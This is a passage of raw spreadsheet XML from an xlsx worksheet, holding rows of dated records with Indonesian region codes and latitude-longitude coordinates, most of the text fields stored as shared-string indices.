      <c r="C3670" s="2">
        <v>0.39365740740740746</v>
      </c>
      <c r="D3670" t="s">
        <v>22</v>
      </c>
      <c r="E3670" t="s">
        <v>23</v>
      </c>
      <c r="F3670" t="s">
        <v>12122</v>
      </c>
      <c r="G3670" t="s">
        <v>12123</v>
      </c>
      <c r="H3670" t="s">
        <v>26</v>
      </c>
      <c r="I3670" t="s">
        <v>3668</v>
      </c>
      <c r="J3670" t="s">
        <v>1128</v>
      </c>
      <c r="L3670" t="s">
        <v>12124</v>
      </c>
      <c r="U3670" s="5">
        <v>12000000</v>
      </c>
      <c r="V3670" s="5" t="s">
        <v>17752</v>
      </c>
      <c r="W3670" s="5">
        <v>-900000</v>
      </c>
      <c r="X3670" t="s">
        <v>21487</v>
      </c>
      <c r="Y3670" t="str">
        <f t="shared" si="57"/>
        <v>-9.00000,120.00000</v>
      </c>
    </row>
    <row r="3671" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3671">
        <v>285521</v>
      </c>
      <c r="B3671" s="1">
        <v>44290</v>
      </c>
      <c r="C3671" s="2">
        <v>0.43062500000000004</v>
      </c>
      <c r="D3671" t="s">
        <v>22</v>
      </c>
      <c r="E3671" t="s">
        <v>23</v>
      </c>
      <c r="F3671" t="s">
        <v>12125</v>
      </c>
      <c r="G3671" t="s">
        <v>12126</v>
      </c>
      <c r="H3671" t="s">
        <v>26</v>
      </c>
      <c r="I3671" t="s">
        <v>10636</v>
      </c>
      <c r="J3671" t="s">
        <v>12102</v>
      </c>
      <c r="L3671" t="s">
        <v>12127</v>
      </c>
      <c r="M3671">
        <v>5308050011</v>
      </c>
      <c r="N3671">
        <v>5308050</v>
      </c>
      <c r="O3671">
        <v>5308</v>
      </c>
      <c r="P3671">
        <v>53</v>
      </c>
      <c r="Q3671" t="s">
        <v>12128</v>
      </c>
      <c r="R3671" t="s">
        <v>12129</v>
      </c>
      <c r="S3671" t="s">
        <v>12130</v>
      </c>
      <c r="T3671" t="s">
        <v>12107</v>
      </c>
      <c r="U3671" s="5">
        <v>12341269</v>
      </c>
      <c r="V3671" s="5" t="s">
        <v>17753</v>
      </c>
      <c r="W3671" s="5">
        <v>-837235</v>
      </c>
      <c r="X3671" t="s">
        <v>21488</v>
      </c>
      <c r="Y3671" t="str">
        <f t="shared" si="57"/>
        <v>-8.37235,123.41269</v>
      </c>
    </row>
    <row r="3672" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3672">
        <v>285522</v>
      </c>
      <c r="B3672" s="1">
        <v>44290</v>
      </c>
      <c r="C3672" s="2">
        <v>0.46730324074074076</v>
      </c>
      <c r="D3672" t="s">
        <v>22</v>
      </c>
      <c r="E3672" t="s">
        <v>23</v>
      </c>
      <c r="F3672" t="s">
        <v>12131</v>
      </c>
      <c r="G3672" t="s">
        <v>12132</v>
      </c>
      <c r="H3672" t="s">
        <v>26</v>
      </c>
      <c r="I3672" t="s">
        <v>2300</v>
      </c>
      <c r="J3672" t="s">
        <v>12102</v>
      </c>
      <c r="L3672" t="s">
        <v>12133</v>
      </c>
      <c r="M3672">
        <v>5371010011</v>
      </c>
      <c r="N3672">
        <v>5371010</v>
      </c>
      <c r="O3672">
        <v>5371</v>
      </c>
      <c r="P3672">
        <v>53</v>
      </c>
      <c r="Q3672" t="s">
        <v>12134</v>
      </c>
      <c r="R3672" t="s">
        <v>12135</v>
      </c>
      <c r="S3672" t="s">
        <v>12121</v>
      </c>
      <c r="T3672" t="s">
        <v>12107</v>
      </c>
      <c r="U3672" s="5">
        <v>12355760</v>
      </c>
      <c r="V3672" s="5" t="s">
        <v>17754</v>
      </c>
      <c r="W3672" s="5">
        <v>-1017612</v>
      </c>
      <c r="X3672" t="s">
        <v>21489</v>
      </c>
      <c r="Y3672" t="str">
        <f t="shared" si="57"/>
        <v>-10.17612,123.55760</v>
      </c>
    </row>
    <row r="3673" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3673">
        <v>285523</v>
      </c>
      <c r="B3673" s="1">
        <v>44290</v>
      </c>
      <c r="C3673" s="2">
        <v>0.6740624999999999</v>
      </c>
      <c r="D3673" t="s">
        <v>22</v>
      </c>
      <c r="E3673" t="s">
        <v>23</v>
      </c>
      <c r="F3673" t="s">
        <v>12136</v>
      </c>
      <c r="G3673" t="s">
        <v>12137</v>
      </c>
      <c r="H3673" t="s">
        <v>26</v>
      </c>
      <c r="I3673" t="s">
        <v>4428</v>
      </c>
      <c r="J3673" t="s">
        <v>12102</v>
      </c>
      <c r="M3673">
        <v>5321110005</v>
      </c>
      <c r="N3673">
        <v>5321110</v>
      </c>
      <c r="O3673">
        <v>5321</v>
      </c>
      <c r="P3673">
        <v>53</v>
      </c>
      <c r="Q3673" t="s">
        <v>12138</v>
      </c>
      <c r="R3673" t="s">
        <v>12139</v>
      </c>
      <c r="S3673" t="s">
        <v>12106</v>
      </c>
      <c r="T3673" t="s">
        <v>12107</v>
      </c>
      <c r="U3673" s="5">
        <v>12505717</v>
      </c>
      <c r="V3673" s="5" t="s">
        <v>17755</v>
      </c>
      <c r="W3673" s="5">
        <v>-948242</v>
      </c>
      <c r="X3673" t="s">
        <v>21490</v>
      </c>
      <c r="Y3673" t="str">
        <f t="shared" si="57"/>
        <v>-9.48242,125.05717</v>
      </c>
    </row>
    <row r="3674" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3674">
        <v>285524</v>
      </c>
      <c r="B3674" s="1">
        <v>44290</v>
      </c>
      <c r="C3674" s="2">
        <v>0.69729166666666664</v>
      </c>
      <c r="D3674" t="s">
        <v>22</v>
      </c>
      <c r="E3674" t="s">
        <v>23</v>
      </c>
      <c r="F3674" t="s">
        <v>12140</v>
      </c>
      <c r="H3674" t="s">
        <v>26</v>
      </c>
      <c r="I3674" t="s">
        <v>639</v>
      </c>
      <c r="J3674" t="s">
        <v>12102</v>
      </c>
      <c r="L3674" t="s">
        <v>12141</v>
      </c>
      <c r="M3674">
        <v>5371020002</v>
      </c>
      <c r="N3674">
        <v>5371020</v>
      </c>
      <c r="O3674">
        <v>5371</v>
      </c>
      <c r="P3674">
        <v>53</v>
      </c>
      <c r="Q3674" t="s">
        <v>12142</v>
      </c>
      <c r="R3674" t="s">
        <v>12143</v>
      </c>
      <c r="S3674" t="s">
        <v>12121</v>
      </c>
      <c r="T3674" t="s">
        <v>12107</v>
      </c>
      <c r="U3674" s="5">
        <v>12360622</v>
      </c>
      <c r="V3674" s="5" t="s">
        <v>17756</v>
      </c>
      <c r="W3674" s="5">
        <v>-1020107</v>
      </c>
      <c r="X3674" t="s">
        <v>21491</v>
      </c>
      <c r="Y3674" t="str">
        <f t="shared" si="57"/>
        <v>-10.20107,123.60622</v>
      </c>
    </row>
    <row r="3675" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3675">
        <v>285525</v>
      </c>
      <c r="B3675" s="1">
        <v>44290</v>
      </c>
      <c r="C3675" s="2">
        <v>0.6987268518518519</v>
      </c>
      <c r="D3675" t="s">
        <v>22</v>
      </c>
      <c r="E3675" t="s">
        <v>23</v>
      </c>
      <c r="F3675" t="s">
        <v>12144</v>
      </c>
      <c r="H3675" t="s">
        <v>26</v>
      </c>
      <c r="I3675" t="s">
        <v>131</v>
      </c>
      <c r="J3675" t="s">
        <v>12102</v>
      </c>
      <c r="L3675" t="s">
        <v>12145</v>
      </c>
      <c r="M3675">
        <v>5302071006</v>
      </c>
      <c r="N3675">
        <v>5302071</v>
      </c>
      <c r="O3675">
        <v>5302</v>
      </c>
      <c r="P3675">
        <v>53</v>
      </c>
      <c r="Q3675" t="s">
        <v>12146</v>
      </c>
      <c r="R3675" t="s">
        <v>12112</v>
      </c>
      <c r="S3675" t="s">
        <v>12113</v>
      </c>
      <c r="T3675" t="s">
        <v>12107</v>
      </c>
      <c r="U3675" s="5">
        <v>12027912</v>
      </c>
      <c r="V3675" s="5" t="s">
        <v>17757</v>
      </c>
      <c r="W3675" s="5">
        <v>-966121</v>
      </c>
      <c r="X3675" t="s">
        <v>21492</v>
      </c>
      <c r="Y3675" t="str">
        <f t="shared" si="57"/>
        <v>-9.66121,120.27912</v>
      </c>
    </row>
    <row r="3676" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3676">
        <v>285526</v>
      </c>
      <c r="B3676" s="1">
        <v>44290</v>
      </c>
      <c r="C3676" s="2">
        <v>0.97416666666666663</v>
      </c>
      <c r="D3676" t="s">
        <v>22</v>
      </c>
      <c r="E3676" t="s">
        <v>23</v>
      </c>
      <c r="F3676" t="s">
        <v>12147</v>
      </c>
      <c r="G3676" t="s">
        <v>12148</v>
      </c>
      <c r="H3676" t="s">
        <v>7978</v>
      </c>
      <c r="I3676" t="s">
        <v>7979</v>
      </c>
      <c r="J3676" t="s">
        <v>12102</v>
      </c>
      <c r="L3676" t="s">
        <v>12149</v>
      </c>
      <c r="M3676">
        <v>5371020002</v>
      </c>
      <c r="N3676">
        <v>5371020</v>
      </c>
      <c r="O3676">
        <v>5371</v>
      </c>
      <c r="P3676">
        <v>53</v>
      </c>
      <c r="Q3676" t="s">
        <v>12142</v>
      </c>
      <c r="R3676" t="s">
        <v>12143</v>
      </c>
      <c r="S3676" t="s">
        <v>12121</v>
      </c>
      <c r="T3676" t="s">
        <v>12107</v>
      </c>
      <c r="U3676" s="5">
        <v>12361085</v>
      </c>
      <c r="V3676" s="5" t="s">
        <v>17758</v>
      </c>
      <c r="W3676" s="5">
        <v>-1020517</v>
      </c>
      <c r="X3676" t="s">
        <v>21493</v>
      </c>
      <c r="Y3676" t="str">
        <f t="shared" si="57"/>
        <v>-10.20517,123.61085</v>
      </c>
    </row>
    <row r="3677" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3677">
        <v>285527</v>
      </c>
      <c r="B3677" s="1">
        <v>44290</v>
      </c>
      <c r="C3677" s="2">
        <v>0.98585648148148142</v>
      </c>
      <c r="D3677" t="s">
        <v>22</v>
      </c>
      <c r="E3677" t="s">
        <v>23</v>
      </c>
      <c r="F3677" t="s">
        <v>12150</v>
      </c>
      <c r="G3677" t="s">
        <v>12151</v>
      </c>
      <c r="H3677" t="s">
        <v>7978</v>
      </c>
      <c r="I3677" t="s">
        <v>7979</v>
      </c>
      <c r="J3677" t="s">
        <v>12102</v>
      </c>
      <c r="L3677" t="s">
        <v>12152</v>
      </c>
      <c r="M3677">
        <v>5371040011</v>
      </c>
      <c r="N3677">
        <v>5371040</v>
      </c>
      <c r="O3677">
        <v>5371</v>
      </c>
      <c r="P3677">
        <v>53</v>
      </c>
      <c r="Q3677" t="s">
        <v>12153</v>
      </c>
      <c r="R3677" t="s">
        <v>12153</v>
      </c>
      <c r="S3677" t="s">
        <v>12121</v>
      </c>
      <c r="T3677" t="s">
        <v>12107</v>
      </c>
      <c r="U3677" s="5">
        <v>12361524</v>
      </c>
      <c r="V3677" s="5" t="s">
        <v>17759</v>
      </c>
      <c r="W3677" s="5">
        <v>-1015837</v>
      </c>
      <c r="X3677" t="s">
        <v>21494</v>
      </c>
      <c r="Y3677" t="str">
        <f t="shared" si="57"/>
        <v>-10.15837,123.61524</v>
      </c>
    </row>
    <row r="3678" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3678">
        <v>285528</v>
      </c>
      <c r="B3678" s="1">
        <v>44291</v>
      </c>
      <c r="C3678" s="2">
        <v>9.4293981481481479E-2</v>
      </c>
      <c r="D3678" t="s">
        <v>22</v>
      </c>
      <c r="E3678" t="s">
        <v>23</v>
      </c>
      <c r="F3678" t="s">
        <v>12154</v>
      </c>
      <c r="H3678" t="s">
        <v>26</v>
      </c>
      <c r="I3678" t="s">
        <v>3275</v>
      </c>
      <c r="J3678" t="s">
        <v>2627</v>
      </c>
      <c r="L3678" t="s">
        <v>12155</v>
      </c>
      <c r="M3678">
        <v>3205190004</v>
      </c>
      <c r="N3678">
        <v>3205190</v>
      </c>
      <c r="O3678">
        <v>3205</v>
      </c>
      <c r="P3678">
        <v>32</v>
      </c>
      <c r="Q3678" t="s">
        <v>12156</v>
      </c>
      <c r="R3678" t="s">
        <v>12157</v>
      </c>
      <c r="S3678" t="s">
        <v>1866</v>
      </c>
      <c r="T3678" t="s">
        <v>42</v>
      </c>
      <c r="U3678" s="5">
        <v>10791228</v>
      </c>
      <c r="V3678" s="5" t="s">
        <v>17760</v>
      </c>
      <c r="W3678" s="5">
        <v>-721489</v>
      </c>
      <c r="X3678" t="s">
        <v>21495</v>
      </c>
      <c r="Y3678" t="str">
        <f t="shared" si="57"/>
        <v>-7.21489,107.91228</v>
      </c>
    </row>
    <row r="3679" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3679">
        <v>285529</v>
      </c>
      <c r="B3679" s="1">
        <v>44291</v>
      </c>
      <c r="C3679" s="2">
        <v>0.16480324074074074</v>
      </c>
      <c r="D3679" t="s">
        <v>22</v>
      </c>
      <c r="E3679" t="s">
        <v>23</v>
      </c>
      <c r="F3679" t="s">
        <v>12158</v>
      </c>
      <c r="G3679" t="s">
        <v>12159</v>
      </c>
      <c r="H3679" t="s">
        <v>26</v>
      </c>
      <c r="I3679" t="s">
        <v>10654</v>
      </c>
      <c r="J3679" t="s">
        <v>12102</v>
      </c>
      <c r="L3679" t="s">
        <v>12160</v>
      </c>
      <c r="M3679">
        <v>5302061004</v>
      </c>
      <c r="N3679">
        <v>5302061</v>
      </c>
      <c r="O3679">
        <v>5302</v>
      </c>
      <c r="P3679">
        <v>53</v>
      </c>
      <c r="Q3679" t="s">
        <v>12161</v>
      </c>
      <c r="R3679" t="s">
        <v>12162</v>
      </c>
      <c r="S3679" t="s">
        <v>12113</v>
      </c>
      <c r="T3679" t="s">
        <v>12107</v>
      </c>
      <c r="U3679" s="5">
        <v>12015241</v>
      </c>
      <c r="V3679" s="5" t="s">
        <v>17761</v>
      </c>
      <c r="W3679" s="5">
        <v>-979553</v>
      </c>
      <c r="X3679" t="s">
        <v>21496</v>
      </c>
      <c r="Y3679" t="str">
        <f t="shared" si="57"/>
        <v>-9.79553,120.15241</v>
      </c>
    </row>
    <row r="3680" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3680">
        <v>285530</v>
      </c>
      <c r="B3680" s="1">
        <v>44291</v>
      </c>
      <c r="C3680" s="2">
        <v>0.21800925925925926</v>
      </c>
      <c r="D3680" t="s">
        <v>22</v>
      </c>
      <c r="E3680" t="s">
        <v>23</v>
      </c>
      <c r="F3680" t="s">
        <v>12163</v>
      </c>
      <c r="G3680" t="s">
        <v>12164</v>
      </c>
      <c r="H3680" t="s">
        <v>26</v>
      </c>
      <c r="I3680" t="s">
        <v>1542</v>
      </c>
      <c r="J3680" t="s">
        <v>12102</v>
      </c>
      <c r="L3680" t="s">
        <v>12165</v>
      </c>
      <c r="M3680">
        <v>5302071005</v>
      </c>
      <c r="N3680">
        <v>5302071</v>
      </c>
      <c r="O3680">
        <v>5302</v>
      </c>
      <c r="P3680">
        <v>53</v>
      </c>
      <c r="Q3680" t="s">
        <v>12111</v>
      </c>
      <c r="R3680" t="s">
        <v>12112</v>
      </c>
      <c r="S3680" t="s">
        <v>12113</v>
      </c>
      <c r="T3680" t="s">
        <v>12107</v>
      </c>
      <c r="U3680" s="5">
        <v>12029531</v>
      </c>
      <c r="V3680" s="5" t="s">
        <v>17762</v>
      </c>
      <c r="W3680" s="5">
        <v>-966294</v>
      </c>
      <c r="X3680" t="s">
        <v>21497</v>
      </c>
      <c r="Y3680" t="str">
        <f t="shared" si="57"/>
        <v>-9.66294,120.29531</v>
      </c>
    </row>
    <row r="3681" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3681">
        <v>285531</v>
      </c>
      <c r="B3681" s="1">
        <v>44291</v>
      </c>
      <c r="C3681" s="2">
        <v>0.20560185185185187</v>
      </c>
      <c r="D3681" t="s">
        <v>85</v>
      </c>
      <c r="E3681" t="s">
        <v>23</v>
      </c>
      <c r="F3681" t="s">
        <v>12166</v>
      </c>
      <c r="G3681" t="s">
        <v>12167</v>
      </c>
      <c r="H3681" t="s">
        <v>26</v>
      </c>
      <c r="J3681" t="s">
        <v>6886</v>
      </c>
      <c r="K3681" t="s">
        <v>12168</v>
      </c>
      <c r="L3681" t="s">
        <v>12169</v>
      </c>
      <c r="M3681">
        <v>3171010006</v>
      </c>
      <c r="N3681">
        <v>3171010</v>
      </c>
      <c r="O3681">
        <v>3171</v>
      </c>
      <c r="P3681">
        <v>31</v>
      </c>
      <c r="Q3681" t="s">
        <v>6888</v>
      </c>
      <c r="R3681" t="s">
        <v>264</v>
      </c>
      <c r="S3681" t="s">
        <v>108</v>
      </c>
      <c r="T3681" t="s">
        <v>33</v>
      </c>
      <c r="U3681" s="5">
        <v>10684789</v>
      </c>
      <c r="V3681" s="5" t="s">
        <v>17763</v>
      </c>
      <c r="W3681" s="5">
        <v>-630837</v>
      </c>
      <c r="X3681" t="s">
        <v>21498</v>
      </c>
      <c r="Y3681" t="str">
        <f t="shared" si="57"/>
        <v>-6.30837,106.84789</v>
      </c>
    </row>
    <row r="3682" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3682">
        <v>285533</v>
      </c>
      <c r="B3682" s="1">
        <v>44291</v>
      </c>
      <c r="C3682" s="2">
        <v>0.35630787037037037</v>
      </c>
      <c r="D3682" t="s">
        <v>22</v>
      </c>
      <c r="E3682" t="s">
        <v>23</v>
      </c>
      <c r="F3682" t="s">
        <v>12170</v>
      </c>
      <c r="G3682" t="s">
        <v>12171</v>
      </c>
      <c r="H3682" t="s">
        <v>26</v>
      </c>
      <c r="I3682" t="s">
        <v>137</v>
      </c>
      <c r="J3682" t="s">
        <v>12102</v>
      </c>
      <c r="M3682">
        <v>5302071003</v>
      </c>
      <c r="N3682">
        <v>5302071</v>
      </c>
      <c r="O3682">
        <v>5302</v>
      </c>
      <c r="P3682">
        <v>53</v>
      </c>
      <c r="Q3682" t="s">
        <v>12172</v>
      </c>
      <c r="R3682" t="s">
        <v>12112</v>
      </c>
      <c r="S3682" t="s">
        <v>12113</v>
      </c>
      <c r="T3682" t="s">
        <v>12107</v>
      </c>
      <c r="U3682" s="5">
        <v>12027723</v>
      </c>
      <c r="V3682" s="5" t="s">
        <v>17764</v>
      </c>
      <c r="W3682" s="5">
        <v>-970598</v>
      </c>
      <c r="X3682" t="s">
        <v>21499</v>
      </c>
      <c r="Y3682" t="str">
        <f t="shared" si="57"/>
        <v>-9.70598,120.27723</v>
      </c>
    </row>
    <row r="3683" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3683">
        <v>285534</v>
      </c>
      <c r="B3683" s="1">
        <v>44291</v>
      </c>
      <c r="C3683" s="2">
        <v>0.57090277777777776</v>
      </c>
      <c r="D3683" t="s">
        <v>22</v>
      </c>
      <c r="E3683" t="s">
        <v>23</v>
      </c>
      <c r="F3683" t="s">
        <v>12173</v>
      </c>
      <c r="G3683" t="s">
        <v>12174</v>
      </c>
      <c r="H3683" t="s">
        <v>7978</v>
      </c>
      <c r="I3683" t="s">
        <v>7979</v>
      </c>
      <c r="J3683" t="s">
        <v>12102</v>
      </c>
      <c r="L3683" t="s">
        <v>12175</v>
      </c>
      <c r="M3683">
        <v>5302070009</v>
      </c>
      <c r="N3683">
        <v>5302070</v>
      </c>
      <c r="O3683">
        <v>5302</v>
      </c>
      <c r="P3683">
        <v>53</v>
      </c>
      <c r="Q3683" t="s">
        <v>12176</v>
      </c>
      <c r="R3683" t="s">
        <v>12177</v>
      </c>
      <c r="S3683" t="s">
        <v>12113</v>
      </c>
      <c r="T3683" t="s">
        <v>12107</v>
      </c>
      <c r="U3683" s="5">
        <v>12026369</v>
      </c>
      <c r="V3683" s="5" t="s">
        <v>17765</v>
      </c>
      <c r="W3683" s="5">
        <v>-965218</v>
      </c>
      <c r="X3683" t="s">
        <v>21500</v>
      </c>
      <c r="Y3683" t="str">
        <f t="shared" si="57"/>
        <v>-9.65218,120.26369</v>
      </c>
    </row>
    <row r="3684" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3684">
        <v>285535</v>
      </c>
      <c r="B3684" s="1">
        <v>44291</v>
      </c>
      <c r="C3684" s="2">
        <v>0.5848726851851852</v>
      </c>
      <c r="D3684" t="s">
        <v>22</v>
      </c>
      <c r="E3684" t="s">
        <v>23</v>
      </c>
      <c r="F3684" t="s">
        <v>12178</v>
      </c>
      <c r="G3684" t="s">
        <v>12179</v>
      </c>
      <c r="H3684" t="s">
        <v>7978</v>
      </c>
      <c r="I3684" t="s">
        <v>7979</v>
      </c>
      <c r="J3684" t="s">
        <v>12102</v>
      </c>
      <c r="L3684" t="s">
        <v>12180</v>
      </c>
      <c r="M3684">
        <v>5302070008</v>
      </c>
      <c r="N3684">
        <v>5302070</v>
      </c>
      <c r="O3684">
        <v>5302</v>
      </c>
      <c r="P3684">
        <v>53</v>
      </c>
      <c r="Q3684" t="s">
        <v>12181</v>
      </c>
      <c r="R3684" t="s">
        <v>12177</v>
      </c>
      <c r="S3684" t="s">
        <v>12113</v>
      </c>
      <c r="T3684" t="s">
        <v>12107</v>
      </c>
      <c r="U3684" s="5">
        <v>12026461</v>
      </c>
      <c r="V3684" s="5" t="s">
        <v>17766</v>
      </c>
      <c r="W3684" s="5">
        <v>-964718</v>
      </c>
      <c r="X3684" t="s">
        <v>21501</v>
      </c>
      <c r="Y3684" t="str">
        <f t="shared" si="57"/>
        <v>-9.64718,120.26461</v>
      </c>
    </row>
    <row r="3685" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3685">
        <v>285536</v>
      </c>
      <c r="B3685" s="1">
        <v>44292</v>
      </c>
      <c r="C3685" s="2">
        <v>0.11666666666666665</v>
      </c>
      <c r="D3685" t="s">
        <v>2648</v>
      </c>
      <c r="E3685" t="s">
        <v>23</v>
      </c>
      <c r="G3685" t="s">
        <v>12182</v>
      </c>
      <c r="H3685" t="s">
        <v>26</v>
      </c>
      <c r="J3685" t="s">
        <v>12011</v>
      </c>
      <c r="L3685" t="s">
        <v>12183</v>
      </c>
      <c r="M3685">
        <v>3172030001</v>
      </c>
      <c r="N3685">
        <v>3172030</v>
      </c>
      <c r="O3685">
        <v>3172</v>
      </c>
      <c r="P3685">
        <v>31</v>
      </c>
      <c r="Q3685" t="s">
        <v>2107</v>
      </c>
      <c r="R3685" t="s">
        <v>228</v>
      </c>
      <c r="S3685" t="s">
        <v>49</v>
      </c>
      <c r="T3685" t="s">
        <v>33</v>
      </c>
      <c r="U3685" s="5">
        <v>10691615</v>
      </c>
      <c r="V3685" s="5" t="s">
        <v>17767</v>
      </c>
      <c r="W3685" s="5">
        <v>-634273</v>
      </c>
      <c r="X3685" t="s">
        <v>21502</v>
      </c>
      <c r="Y3685" t="str">
        <f t="shared" si="57"/>
        <v>-6.34273,106.91615</v>
      </c>
    </row>
    <row r="3686" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3686">
        <v>285585</v>
      </c>
      <c r="B3686" s="1">
        <v>44292</v>
      </c>
      <c r="C3686" s="2">
        <v>0.5113657407407407</v>
      </c>
      <c r="D3686" t="s">
        <v>22</v>
      </c>
      <c r="E3686" t="s">
        <v>23</v>
      </c>
      <c r="F3686" t="s">
        <v>12184</v>
      </c>
      <c r="H3686" t="s">
        <v>26</v>
      </c>
      <c r="I3686" t="s">
        <v>11581</v>
      </c>
      <c r="J3686" t="s">
        <v>6038</v>
      </c>
      <c r="L3686" t="s">
        <v>12185</v>
      </c>
      <c r="M3686">
        <v>1212280001</v>
      </c>
      <c r="N3686">
        <v>1212280</v>
      </c>
      <c r="O3686">
        <v>1212</v>
      </c>
      <c r="P3686">
        <v>12</v>
      </c>
      <c r="Q3686" t="s">
        <v>12186</v>
      </c>
      <c r="R3686" t="s">
        <v>12187</v>
      </c>
      <c r="S3686" t="s">
        <v>8342</v>
      </c>
      <c r="T3686" t="s">
        <v>6043</v>
      </c>
      <c r="U3686" s="5">
        <v>9884366</v>
      </c>
      <c r="V3686" s="5" t="s">
        <v>17768</v>
      </c>
      <c r="W3686" s="5">
        <v>369072</v>
      </c>
      <c r="X3686" t="s">
        <v>21503</v>
      </c>
      <c r="Y3686" t="str">
        <f t="shared" si="57"/>
        <v>3.69072,98.84366</v>
      </c>
    </row>
    <row r="3687" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3687">
        <v>285588</v>
      </c>
      <c r="B3687" s="1">
        <v>44294</v>
      </c>
      <c r="C3687" s="2">
        <v>0.14662037037037037</v>
      </c>
      <c r="D3687" t="s">
        <v>22</v>
      </c>
      <c r="E3687" t="s">
        <v>23</v>
      </c>
      <c r="F3687" t="s">
        <v>12188</v>
      </c>
      <c r="G3687" t="s">
        <v>12189</v>
      </c>
      <c r="H3687" t="s">
        <v>26</v>
      </c>
      <c r="I3687" t="s">
        <v>2134</v>
      </c>
      <c r="J3687" t="s">
        <v>12102</v>
      </c>
      <c r="L3687" t="s">
        <v>12190</v>
      </c>
      <c r="M3687">
        <v>5307012003</v>
      </c>
      <c r="N3687">
        <v>5307012</v>
      </c>
      <c r="O3687">
        <v>5307</v>
      </c>
      <c r="P3687">
        <v>53</v>
      </c>
      <c r="Q3687" t="s">
        <v>12191</v>
      </c>
      <c r="R3687" t="s">
        <v>12192</v>
      </c>
      <c r="S3687" t="s">
        <v>12193</v>
      </c>
      <c r="T3687" t="s">
        <v>12107</v>
      </c>
      <c r="U3687" s="5">
        <v>12423552</v>
      </c>
      <c r="V3687" s="5" t="s">
        <v>17769</v>
      </c>
      <c r="W3687" s="5">
        <v>-837470</v>
      </c>
      <c r="X3687" t="s">
        <v>21504</v>
      </c>
      <c r="Y3687" t="str">
        <f t="shared" si="57"/>
        <v>-8.37470,124.23552</v>
      </c>
    </row>
    <row r="3688" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3688">
        <v>285589</v>
      </c>
      <c r="B3688" s="1">
        <v>44294</v>
      </c>
      <c r="C3688" s="2">
        <v>0.15138888888888888</v>
      </c>
      <c r="D3688" t="s">
        <v>22</v>
      </c>
      <c r="E3688" t="s">
        <v>23</v>
      </c>
      <c r="F3688" t="s">
        <v>12194</v>
      </c>
      <c r="G3688" t="s">
        <v>12195</v>
      </c>
      <c r="H3688" t="s">
        <v>26</v>
      </c>
      <c r="I3688" t="s">
        <v>137</v>
      </c>
      <c r="J3688" t="s">
        <v>12102</v>
      </c>
      <c r="L3688" t="s">
        <v>12196</v>
      </c>
      <c r="M3688">
        <v>5307030004</v>
      </c>
      <c r="N3688">
        <v>5307030</v>
      </c>
      <c r="O3688">
        <v>5307</v>
      </c>
      <c r="P3688">
        <v>53</v>
      </c>
      <c r="Q3688" t="s">
        <v>12197</v>
      </c>
      <c r="R3688" t="s">
        <v>12198</v>
      </c>
      <c r="S3688" t="s">
        <v>12193</v>
      </c>
      <c r="T3688" t="s">
        <v>12107</v>
      </c>
      <c r="U3688" s="5">
        <v>12476083</v>
      </c>
      <c r="V3688" s="5" t="s">
        <v>17770</v>
      </c>
      <c r="W3688" s="5">
        <v>-838509</v>
      </c>
      <c r="X3688" t="s">
        <v>21505</v>
      </c>
      <c r="Y3688" t="str">
        <f t="shared" si="57"/>
        <v>-8.38509,124.76083</v>
      </c>
    </row>
    <row r="3689" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3689">
        <v>285590</v>
      </c>
      <c r="B3689" s="1">
        <v>44295</v>
      </c>
      <c r="C3689" s="2">
        <v>0.35162037037037036</v>
      </c>
      <c r="D3689" t="s">
        <v>22</v>
      </c>
      <c r="E3689" t="s">
        <v>23</v>
      </c>
      <c r="F3689" t="s">
        <v>12199</v>
      </c>
      <c r="G3689" t="s">
        <v>12200</v>
      </c>
      <c r="H3689" t="s">
        <v>8525</v>
      </c>
      <c r="I3689" t="s">
        <v>12201</v>
      </c>
      <c r="J3689" t="s">
        <v>12202</v>
      </c>
      <c r="L3689" t="s">
        <v>12203</v>
      </c>
      <c r="M3689">
        <v>3173030005</v>
      </c>
      <c r="N3689">
        <v>3173030</v>
      </c>
      <c r="O3689">
        <v>3173</v>
      </c>
      <c r="P3689">
        <v>31</v>
      </c>
      <c r="Q3689" t="s">
        <v>3128</v>
      </c>
      <c r="R3689" t="s">
        <v>3128</v>
      </c>
      <c r="S3689" t="s">
        <v>62</v>
      </c>
      <c r="T3689" t="s">
        <v>33</v>
      </c>
      <c r="U3689" s="5">
        <v>10683663</v>
      </c>
      <c r="V3689" s="5" t="s">
        <v>17771</v>
      </c>
      <c r="W3689" s="5">
        <v>-617571</v>
      </c>
      <c r="X3689" t="s">
        <v>21506</v>
      </c>
      <c r="Y3689" t="str">
        <f t="shared" si="57"/>
        <v>-6.17571,106.83663</v>
      </c>
    </row>
    <row r="3690" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3690">
        <v>285591</v>
      </c>
      <c r="B3690" s="1">
        <v>44295</v>
      </c>
      <c r="C3690" s="2">
        <v>0.74671296296296286</v>
      </c>
      <c r="D3690" t="s">
        <v>22</v>
      </c>
      <c r="E3690" t="s">
        <v>23</v>
      </c>
      <c r="F3690" t="s">
        <v>12204</v>
      </c>
      <c r="G3690" t="s">
        <v>12205</v>
      </c>
      <c r="H3690" t="s">
        <v>26</v>
      </c>
      <c r="I3690" t="s">
        <v>137</v>
      </c>
      <c r="J3690" t="s">
        <v>6707</v>
      </c>
      <c r="L3690" t="s">
        <v>12206</v>
      </c>
      <c r="M3690">
        <v>5206020014</v>
      </c>
      <c r="N3690">
        <v>5206020</v>
      </c>
      <c r="O3690">
        <v>5206</v>
      </c>
      <c r="P3690">
        <v>52</v>
      </c>
      <c r="Q3690" t="s">
        <v>12207</v>
      </c>
      <c r="R3690" t="s">
        <v>12094</v>
      </c>
      <c r="S3690" t="s">
        <v>12085</v>
      </c>
      <c r="T3690" t="s">
        <v>2154</v>
      </c>
